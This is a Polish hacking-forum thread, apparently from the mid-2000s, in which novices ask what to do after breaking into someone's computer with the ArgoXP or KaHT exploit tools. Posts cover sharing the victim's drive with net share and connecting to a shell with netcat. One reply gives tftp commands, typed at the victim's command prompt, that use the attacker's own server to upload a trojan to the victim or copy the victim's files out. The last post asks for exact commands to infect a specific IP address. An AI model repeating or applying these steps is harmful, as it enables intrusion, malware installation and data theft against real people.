exploit ,co dalej???

piter514

Użytkownik
Dołączył
Grudzień 29, 2005
Posty
15
chciałbym się spytać co robić dalej jak już za pomocą ArgoXP albo KaHT wejdę na czyjść komp?
mam wpisać net share dyskc=c: {co to daje}
później "jegoIP"dyskc... {co z tym dalej??}
no i oczywiście chciałbym sięspytać jak skopiować jakiś plik,np chciałbym wysłać komuś trojana i go uruchomić,jakie są na to komendy??wiem chyba że powinno być coś takiego:
A:>trojan.exe copy ........... i co dalej ? ? ?

z góry dziękuję i pozdro

P.S. jeszcze chciałbym siętak dla pewności spytać czy jak mi z Argo wyskakuje connected później wchodze na cmd i wpisuje nc xx.xx.xx.xxx 1981 to jak sięobjawi to że sięz nim połącze?? przez chwilę na niebieskim pasku jest
C:windowssystem32cmd.exe -pulpitnc xx.xx.xx.xxx 1981 a później to znika,czy jestem z nim połączony?


wiem że to dość lamerskie pytania ,ale chciałbym się dowiedzieć
 

BolekTrojan

Użytkownik
Dołączył
Sierpień 18, 2005
Posty
149
Polecenia dosa trzeba znac
<
 

piter514

Użytkownik
Dołączył
Grudzień 29, 2005
Posty
15
no tak ale jak to ułożyć?? do kopiowania służy komenda copy ale nie wiem jak to napisać z jednego komputera do drugiego
A:>trojan.exe copy xx.xx.xx.xxxdysk$ctrojan.exe ????????
czy coś takiego zadziała??
Jak się objawia to że jestem podłączony??
 

piter514

Użytkownik
Dołączył
Grudzień 29, 2005
Posty
15
No ale co to za serwer?? co on da?? do czego go można użyć?? możesz podać jakieś przykłady albo linki?? Pzodro
 

ktostam

Użytkownik
Dołączył
Wrzesień 15, 2005
Posty
50
znajdź se gdzies serwer tfpt (zassisj se z tąąąąąąąąd ) uruchom to cuś . Wybież katalog se na ktorym masz trojany (serwery jakby co). walnij se uruchom wpisz cmd i w koncopi tftp , dowiedz sie o co biega
smile.gif
 

Riddick1

Użytkownik
Dołączył
Grudzień 18, 2005
Posty
49
No właśnie, a jeśli ja wejde za pomocą Argo czy Kahta komuś do kompa, i czy moge skopiować od niego sobie jakiś plik, jeśli tak to jaką komende cza wpisać.
 

Pepi

Użytkownik
Dołączył
Maj 29, 2004
Posty
245
zlituje sie i napisze
ale na wstepie to ostatnia rada a jak nie pujdzie ci to lepiej zajmij sie gotowaniem a nie takim czyms :!:

zassaj serwer tftp
odpal go i w wierszu polecen u ofiary wpisz

a)jesli chcesz wysłac plik do ofiary
Kod:
tftp -i <twoje_IP> PUT c:....zrodlo_pliku_u_ciebie.exe c:....tam_gdzie_ma_sie_zapisac_plik_u_ofiary.exe

b)jesli chcesz cos skopiowac od ofiary
Kod:
tftp -i <twoje_IP> GET c:....zrodlo_pliku_u_ofiary.exe c:....tam_gdzie_ma_sie_zapisac_plik_u_ciebie.exe

ino pamietaj o aktywnym serwerze tftp u siebie :!:
 

piter514

Użytkownik
Dołączył
Grudzień 29, 2005
Posty
15
Wszystko ok ale jak to wysyłam to mi wyskakuje błąd na serwerze:access violation
????co to jest ,czy coś źle zrobiłem??
 

Riddick1

Użytkownik
Dołączył
Grudzień 18, 2005
Posty
49
Nie jestm w tym dobrze obcykany, ale jak dotąd wcześniejszą rozmowe przyswoiłem sobie, ale nieumiem pojąć tego jak ja moge sobie zassać serwer z tej strony, może mi ktoś pomóc.
 

piter514

Użytkownik
Dołączył
Grudzień 29, 2005
Posty
15
Dlaczego wyskakuje wiadomość ,że upłynął limit czasu??co teraz mam zrobić?? jak wysyłam do niego plik to musze podać adres w jaki sposób? mogę po prostu C:windows i to wszystko?? pozdro
 

Riddick1

Użytkownik
Dołączył
Grudzień 18, 2005
Posty
49
No dobrze sciągłem sobie ten serwer i co dalej, czy trzeba coś robić jeszcze, bo jak to otwieram to wyskakuje okno i w nim pisze twój serwer jest aktywny, i czy może mi ktoś wytłumaczyc do czego on jest i co on ma z tym wspólnego.??????????????
 

piter514

Użytkownik
Dołączył
Grudzień 29, 2005
Posty
15
mi ciągle ni wychodzi.... czy może ktoś napisać jak mam sięwłamać do komputera o nr 10.11.1.148 i wysłać mu trojana z pliku A:cafeinicafeiniserver.exe ,a mój IP by był (załóżmy) 10.11.1.111. Czy może to ktoś zapisać poprawnie z komendami?? bo mi ciągle coś nie wychodzi,co chwila jakieś błędy i nie mogę sobie poradzić. Bardzo dziękuje Pozdrowienia
 
Do góry Bottom